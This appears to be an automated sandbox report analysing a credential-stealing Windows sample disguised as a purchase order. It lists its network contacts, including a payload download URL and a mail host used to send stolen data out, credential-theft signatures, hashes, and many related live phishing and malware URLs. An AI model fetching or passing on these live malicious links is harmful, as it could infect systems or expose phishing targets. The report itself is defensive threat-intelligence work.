                MSBuild.exe 15 9 started (child of powershell.exe 15) | DNS/IP: mail.qualityaf.com 192.185.148.49, 49710, 49711, 49713 UNIFIEDLAYER-AS-1US United States; api4.ipify.org 104.237.62.211, 443, 49709 WEBNXUS United States; 172.96.14.41, 49708, 80 UNREAL-SERVERSUS Canada | Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 3 other signatures

                Source | Detection | Scanner | Label
                PO_00290292.exe | 5% | ReversingLabs |
                PO_00290292.exe | 16% | Virustotal |
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | 0% | ReversingLabs |
                C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | 1% | Virustotal |
                No Antivirus matches
                Source | Detection | Scanner | Label
                mail.qualityaf.com | 0% | Virustotal |
                fp2e7a.wpc.phicdn.net | 0% | Virustotal |
                Source | Detection | Scanner | Label
                http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
                http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
                http://crl.microsoft | 0% | URL Reputation | safe
                http://crl.microsoft | 0% | URL Reputation | safe
                http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
                http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
                https://contoso.com/ | 0% | URL Reputation | safe
                https://contoso.com/License | 0% | URL Reputation | safe
                https://contoso.com/Icon | 0% | URL Reputation | safe
                http://r3.o.lencr.org0 | 0% | URL Reputation | safe
                http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
                http://172.96.14.41/mfMeuTZ127.bin& | 0% | Avira URL Cloud | safe
                http://172.96.14.41/mfMeuTZ127.bin | 0% | Avira URL Cloud | safe
                http://mail.qualityaf.com | 0% | Avira URL Cloud | safe
                http://www.microsoft.coB | 0% | Avira URL Cloud | safe
                http://r3.i.lencr.org/0) | 0% | Avira URL Cloud | safe
                http://172.96.14.41/mfMeuTZ127.bin | 3% | Virustotal |
                http://r3.i.lencr.org/0) | 0% | Virustotal |
                http://mail.qualityaf.com | 0% | Virustotal |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                api4.ipify.org | 104.237.62.211 | true | false | | high
                mail.qualityaf.com | 192.185.148.49 | true | true | | unknown
                fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown
                api.ipify.org | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                https://api.ipify.org/ | false | | high
                http://172.96.14.41/mfMeuTZ127.bin | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.ipify.org | MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://172.96.14.41/mfMeuTZ127.bin& | MSBuild.exe, 00000005.00000002.2591135790.0000000004322000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
                https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://crl.microsoft | powershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://x1.c.lencr.org/0 | MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://x1.i.lencr.org/0 | MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://mail.qualityaf.com | MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.000000002019C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                https://contoso.com/ | powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://contoso.com/License | powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp | false |
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://r3.o.lencr.org0MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://nsis.sf.net/NSIS_ErrorErrorPO_00290292.exefalse
                                  high
                                  https://api.ipify.org/tMSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://r3.i.lencr.org/0)MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.microsoft.coBpowershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://cps.root-x1.letsencrypt.org0MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 192.185.148.49 | mail.qualityaf.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true |
| 104.237.62.211 | api4.ipify.org | United States | 18450 | WEBNXUS | false |
| 172.96.14.41 | unknown | Canada | 64236 | UNREAL-SERVERSUS | false |
Joe Sandbox version: 39.0.0 Ruby
Analysis ID: 1380074
Start date and time: 2024-01-24 09:01:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO_00290292.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@8/15@2/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 226
• Number of non-executed functions: 26
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 40.127.169.103, 192.229.211.108, 20.3.187.198, 20.242.39.171
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6060 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analysed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 09:02:18 | API Interceptor | 132x Sleep call for process: powershell.exe modified |
| 09:02:39 | API Interceptor | 1199988x Sleep call for process: MSBuild.exe modified |
| 09:02:54 | API Interceptor | 4x Sleep call for process: PO_00290292.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 192.185.148.49 | RFQ_002902999.exe | malicious | AgentTesla, GuLoader | |
| 192.185.148.49 | order_confirm_PDF.exe | malicious | AgentTesla, GuLoader | |
| 104.237.62.211 | 1.wsf | malicious | AsyncRAT, StormKitty, zgRAT | api.ipify.org/ |
| 104.237.62.211 | 1.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/ |
| 104.237.62.211 | vksp | malicious | Unknown | api.ipify.org/ |
| 104.237.62.211 | mallox.bin.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/ |
| 104.237.62.211 | f18itb3RpL.exe | malicious | Unknown | api.ipify.org/ |
| 104.237.62.211 | Nemty.exe | malicious | Nemty | api.ipify.org/ |
| 104.237.62.211 | b9.exe | malicious | Typhon Stealer | api.ipify.org/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| fp2e7a.wpc.phicdn.net | https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//sophielanda.com.au%2Fimag3in%2Fkindlue%2F3xf35o/bGluZWFtYWRyaWRAbWFkcmlkLmVz | malicious | Unknown | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | JOpPQBoz65.exe | malicious | LummaC, zgRAT | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://mobilemodula.com/Mbryan@example.org | malicious | HtmlDropper, HTMLPhisher | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://perspectivefunnel.co/65af3e96eabac400142170f9/65afc3e15eaba70014d7303b | malicious | HtmlDropper, HTMLPhisher | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://dejamom.com | malicious | HtmlDropper, HTMLPhisher | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://stamentofinfo.us-lax-1.linodeobjects.com/payoutinfo.html#frank.user@fbi.gov.au | malicious | HTMLPhisher | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://www.myfamilycare.co.uk/newsletter_tracker/?tokenKey=10adbd906d9961745bdf02ef2de644d5&campaignName=wfs-update-wy-02-apr-2020&lnk=href&url=HTTP%3a%2f%2fdpQYAdpQYA%2edpQYAdpQYA%2einnovigic%2ein%2f%2FYWJ1c2VAaW5vdmFsb24uY29t%3fabuse@inovalon.com | malicious | Unknown | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://perspectivefunnel.co/65af3e96eabac400142170f9/65afc3e15eaba70014d7303b/ | malicious | HtmlDropper, HTMLPhisher | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://link.mail.beehiiv.com/ls/click?upn=U3KC0-2BN7NjTBPeCl-2F9sZ8KjKNd8ZYWHPWq7ahxdo-2BE9dU10I-2FxfUbt5KMn9H05Dl-2BoU088pd9g1sncmN8DhaTQF2CfO87j-2BvLkjS73jMKGMnV2vpNgifKh1urCEdMf-2B7g8oiqw24CwkjtggvCaQSwjpqB01qOPh1w5buwykvzdY-3D23Pn_Pq3I9Eh0D9rhg7rSp11fzgH0J5A0HEAWnXS0zelxr-2BjIa8v7jfhBQAp813yLZDZqIlGIE-2Fg9dECDv0OREVLFJs9YNSF80RAVs4jCfFGdCSnH8guXKQvcBK1yAQawZj2pMkxppYyLG7LGlAv8sEcstVYJJrJgyLDWmM-2F73wbCuAbEo7jSY6-2BsaNZfFyriEw5CNeskZ85GxnpFGUHgRrMXdNRgVOdw0dvhBQUxZQDMrSidKaSTb5W4yFZH7TRw1PK44EbyWpuaEecZ7IpwMPHzf8jTUbq04ui0-2B0cZheMFxocxD6NMYRN90SFBBAsy-2F0ypshz4IsaBAlxI76U7MmweXsUXaoHVJf3wIyfZKHNXWKsqJH0KJlJu1cFOLH-2FGPLm-2BtcQeXAu91o2qP-2BoqsR83dYlCIrZEmUjh9x7J1o-2B8hzgsB-2FcD1xocOJF-2FMqOJceIFBOs-2BK-2BTiC1PyAgm8Nmt7Ag-3D-3D#ZGpva28uZG9icmljQGNlbnRyYWxpYW4uY29tLmF1 | malicious | HTMLPhisher | 192.229.211.108 |
| fp2e7a.wpc.phicdn.net | https://agenciacrl.com/it_wATd-l2g31icga/int_logonbuGidk/ | malicious | Unknown | 192.229.211.108 |
| api4.ipify.org | MACHINE_QUOTATION.exe | malicious | AgentTesla | 64.185.227.156 |
| api4.ipify.org | Proforma_Invoice.exe | malicious | AgentTesla | 64.185.227.156 |
| api4.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.1352.2615.exe | malicious | AgentTesla | 173.231.16.75 |
| api4.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.15348.28328.exe | malicious | AgentTesla | 173.231.16.75 |
| api4.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.21844.9999.exe | malicious | AgentTesla | 173.231.16.75 |
| api4.ipify.org | 3B18P2HItV.exe | malicious | AgentTesla, RedLine | 64.185.227.156 |
| api4.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.17929.17557.exe | malicious | AgentTesla | 104.237.62.211 |
| api4.ipify.org | SecuriteInfo.com.Trojan.Packed2.46177.25997.17888.exe | malicious | AgentTesla | 173.231.16.75 |
| api4.ipify.org | https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5 | malicious | HTMLPhisher | 64.185.227.156 |
| api4.ipify.org | PO#_231001759.exe | malicious | AgentTesla | 173.231.16.75 |
| mail.qualityaf.com | RFQ_002902999.exe | malicious | AgentTesla, GuLoader | 192.185.148.49 |
| mail.qualityaf.com | order_confirm_PDF.exe | malicious | AgentTesla, GuLoader | 192.185.148.49 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| UNREAL-SERVERSUS | Payment Advice Copy_ BSP Fiji_pdf.exe | malicious | Remcos, PureLog Stealer | 172.96.14.67 |
| UNREAL-SERVERSUS | Rfq00888778.exe | malicious | FormBook, GuLoader | 212.162.149.96 |
| UNREAL-SERVERSUS | RFQ_002902999.exe | malicious | AgentTesla, GuLoader | 212.162.149.96 |
| UNREAL-SERVERSUS | Hospital_Inquiry_List_3892892921.exe | malicious | AgentTesla, GuLoader | 212.162.149.96 |
| UNREAL-SERVERSUS | Order_N#U00b0_202200027.exe | malicious | FormBook, GuLoader | 212.162.149.96 |
| UNREAL-SERVERSUS | RFQ_0098W662L9.exe | malicious | Remcos, GuLoader | 185.202.173.178 |
| UNREAL-SERVERSUS | maalesteder.exe | malicious | Remcos, GuLoader | 185.202.175.170 |
| UNREAL-SERVERSUS | Postsigner.exe | malicious | GuLoader | 185.202.175.201 |
| UNREAL-SERVERSUS | SPEC0376353400000256.exe | malicious | Remcos, GuLoader | 185.202.175.201 |
| UNREAL-SERVERSUS | [DURAE]_INQUIRY_20230010.exe | malicious | Remcos, GuLoader | 172.96.14.18 |
| UNIFIEDLAYER-AS-1US | MACHINE_QUOTATION.exe | malicious | AgentTesla | 192.254.225.136 |
| UNIFIEDLAYER-AS-1US | https://stamentofinfo.us-lax-1.linodeobjects.com/payoutinfo.html#frank.user@fbi.gov.au | malicious | HTMLPhisher | 192.185.146.109 |
| UNIFIEDLAYER-AS-1US | https://www.myfamilycare.co.uk/newsletter_tracker/?tokenKey=10adbd906d9961745bdf02ef2de644d5&campaignName=wfs-update-wy-02-apr-2020&lnk=href&url=HTTP%3a%2f%2fdpQYAdpQYA%2edpQYAdpQYA%2einnovigic%2ein%2f%2FYWJ1c2VAaW5vdmFsb24uY29t%3fabuse@inovalon.com | malicious | Unknown | 162.144.105.201 |
| UNIFIEDLAYER-AS-1US | https://www.my-link.com.au/mtcgi/tracklink3.php?x=D0304A3F.05AAE513&href=//executivamallet.com/me/cv/Acegutters/cGx1bWJpbmcuc2FsZXNAYWNlZ3V0dGVycy5jb20uYXU= | malicious | HTMLPhisher | 108.179.253.169 |
| UNIFIEDLAYER-AS-1US | https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//gigglingflamingo.com/fresh/bott/asdf/bjparish@steinborn.com | malicious | HTMLPhisher | 162.241.120.242 |
| UNIFIEDLAYER-AS-1US | FatRE012024.msi | malicious | Unknown | 192.185.215.152 |
| UNIFIEDLAYER-AS-1US | https://stats.sender.net/link_click/Nu71TBYERW_LOtYH/b926d7d2b5b7eeed918c842713ab9677#c2FyYWgucmF5bm9yQG93ZW5zLW1pbm9yLmNvbQ== | malicious | HTMLPhisher | 108.179.252.92 |
| UNIFIEDLAYER-AS-1US | https://stats.sender.net/link_click/NuoFnYd1dw_LMgXF/a688273cd4a393802dbf8a14d5e1a550#cm9iaW5zb252QGFpcmJvcm4uY29t | malicious | HTMLPhisher | 69.49.245.172 |
| UNIFIEDLAYER-AS-1US | https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5 | malicious | HTMLPhisher | 69.49.230.198 |
| UNIFIEDLAYER-AS-1US | http://www.alserhgroup.com/ | malicious | Unknown | 192.185.48.207 |
| WEBNXUS | MACHINE_QUOTATION.exe | malicious | AgentTesla | 64.185.227.156 |
| WEBNXUS | Proforma_Invoice.exe | malicious | AgentTesla | 64.185.227.156 |
| WEBNXUS | SecuriteInfo.com.Win32.PWSX-gen.1352.2615.exe | malicious | AgentTesla | 173.231.16.75 |
| WEBNXUS | SecuriteInfo.com.Win32.PWSX-gen.15348.28328.exe | malicious | AgentTesla | 173.231.16.75 |
| WEBNXUS | SecuriteInfo.com.Win32.PWSX-gen.21844.9999.exe | malicious | AgentTesla | 173.231.16.75 |
| WEBNXUS | 3B18P2HItV.exe | malicious | AgentTesla, RedLine | 64.185.227.156 |
| WEBNXUS | SecuriteInfo.com.Win32.PWSX-gen.17929.17557.exe | malicious | AgentTesla | 104.237.62.211 |
| WEBNXUS | SecuriteInfo.com.Trojan.Packed2.46177.25997.17888.exe | malicious | AgentTesla | 173.231.16.75 |
| WEBNXUS | http://www.corporateworldwidetransportation.com/ | malicious | Unknown | 64.185.227.155 |
| WEBNXUS | https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5 | malicious | HTMLPhisher | 64.185.227.156 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 1138de370e523e824bbca92d049a3777 | https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//sophielanda.com.au%2Fimag3in%2Fkindlue%2F3xf35o/bGluZWFtYWRyaWRAbWFkcmlkLmVz | malicious | Unknown | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | JOpPQBoz65.exe | malicious | LummaC, zgRAT | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | https://perspectivefunnel.co/65af3e96eabac400142170f9/65afc3e15eaba70014d7303b | malicious | HtmlDropper, HTMLPhisher | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | http://185.81.157.104:222/PtZrTZD0WXqkQdXp.txt | malicious | Unknown | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | https://drive.usercontent.google.com/download?id=1oHdUaAoRB_AkM6t_F5NEiKwf7wWZkAjY&export=download | malicious | Unknown | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | https://qjkwdvhujdqw.weeblysite.com/ | malicious | Unknown | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | https://main.d2eo0cxrw88mo4.amplifyapp.com/windesk/00Windinside0actlatest/index.html | malicious | Unknown | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | http://telegrnne.work/ | malicious | Telegram Phisher | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | https://a.83-229-5-136.cprapid.com/ | malicious | Unknown | 23.206.229.226 |
| 1138de370e523e824bbca92d049a3777 | https://interlab.com.sg/66/-/billing.php | malicious | Unknown | 23.206.229.226 |
| 3b5074b1b5d032e5620f69f9f700ff0e | MACHINE_QUOTATION.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Proforma_Invoice.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.1352.2615.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.15348.28328.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.21844.9999.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | bTgH.exe | malicious | Njrat | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | 3B18P2HItV.exe | malicious | AgentTesla, RedLine | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.17929.17557.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.Packed2.46177.25997.17888.exe | malicious | AgentTesla | 104.237.62.211 |
| 3b5074b1b5d032e5620f69f9f700ff0e | New_Project_1.exe | malicious | Phemedrone Stealer, Xmrig | 104.237.62.211 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | teamviewer_Px-yDq1.exe | malicious | Unknown | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | teamviewer_Px-yDq1.exe | malicious | Unknown | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | SMGS-RCDU5010031.exe | malicious | GuLoader, Remcos | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | SMGS-RCDU5010031.exe | malicious | GuLoader | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | RC_S23_3274 Or_amento ADP 231019_5_5009.exe | malicious | GuLoader, Remcos | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | RC_S23_3274 Or_amento ADP 231019_5_5009.exe | malicious | GuLoader | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | IMG-2023010_WAA646737kendelsesordningenBalneo.exe | malicious | GuLoader, Remcos | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | IMG-2023010_WAA646737kendelsesordningenBalneo.exe | malicious | GuLoader | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | Pepsico_LLC_RFQ_Information.com.exe | malicious | GuLoader | |
| C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll | Pepsico_LLC_RFQ_Information.exe | malicious | GuLoader | |
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.838950934453595
Encrypted: false
SSDEEP: 192:Dxoe5nVsm5emdZ2Ca6pZlbjvwRjdHPRhwgkjDt4iWN3yBGHB9smMdcU6CDpOeibY:NQopbjvwRjdvR5kjh4iUxeLib4J
MD5: 3D6DC70FDDC7BE176013904F5F6ED066
SHA1: 73638AF4A419E0A7DC397B9477A0C2EDB8DE9490
SHA-256: 5D7466A771B69DBDB540C50BC6EBE324B4FA3BDA6E0F4CC92CEC930148FCCFAA
SHA-512: 60552F022AE9418514820B7BF8243434FFE2BBEE7F34D8ED7D053679928C583CFB4C07FE62588629A6064C196184F6DB0D7FDBDB26692FC1CA9B1C99F248B117
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1272
Entropy (8bit): 5.397399275438495
Encrypted: false
SSDEEP: 24:37WSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R88Hr2Vbu:rWSU4y4RQmFoUeUmfmZ9tlNWR8OqVbu
MD5: 331F69B9C429BA0CE71C04EA0AA4B115
SHA1: BC95D0936B2B208A7AA48A1A259ADA1216BFD5A1
SHA-256: D51677FF5BAB9E2060FF6B67F1A1958F11178EF36DF8D2BD9F043826CA47E8DE
SHA-512: 85413E9CC5CA9B12FA835D479904834EA3E1BEC693CCE00E496E98398AD02EF7914621611752445932384C1B2A5F188B2513C02974254B12951FC0D8E2215289
Malicious: false
Reputation: moderate, very likely benign file
